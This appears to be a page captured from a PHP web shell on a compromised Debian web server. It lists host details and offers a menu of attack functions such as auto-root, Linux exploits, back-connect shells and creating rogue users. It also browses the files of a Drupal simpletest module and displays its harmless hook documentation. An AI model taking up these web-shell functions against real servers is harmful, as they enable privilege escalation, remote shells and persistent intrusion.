Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.226.28.97
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
simpletest /
[ HOME SHELL ]
Name
Size
Permission
Action
files
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
drupal_web_test_case.php
131.51
KB
-rw-r--r--
simpletest.api.php
1.19
KB
-rw-r--r--
simpletest.css
1.47
KB
-rw-r--r--
simpletest.info
1.95
KB
-rw-r--r--
simpletest.install
6.68
KB
-rw-r--r--
simpletest.js
3.51
KB
-rw-r--r--
simpletest.module
23.38
KB
-rw-r--r--
simpletest.pages.inc
17.59
KB
-rw-r--r--
simpletest.test
27.8
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : simpletest.api.php
<?php /** * @file * Hooks provided by the SimpleTest module. */ /** * @addtogroup hooks * @{ */ /** * Alter the list of tests. * * @param $groups * A two dimension array, the first key is the test group (as defined in * getInfo) the second is the name of the class and the value is the return * value of the getInfo method. */ function hook_simpletest_alter(&$groups) { // An alternative session handler module would not want to run the original // Session HTTPS handling test because it checks the sessions table in the // database. unset($groups['Session']['testHttpsSession']); } /** * A test group has started. * * This hook is called just once at the beginning of a test group. */ function hook_test_group_started() { } /** * A test group has finished. * * This hook is called just once at the end of a test group. */ function hook_test_group_finished() { } /** * An individual test has finished. * * This hook is called when an individual test has finished. * * @param * $results The results of the test as gathered by DrupalWebTestCase. * * @see DrupalWebTestCase->results */ function hook_test_finished($results) { } /** * @} End of "addtogroup hooks". */
Close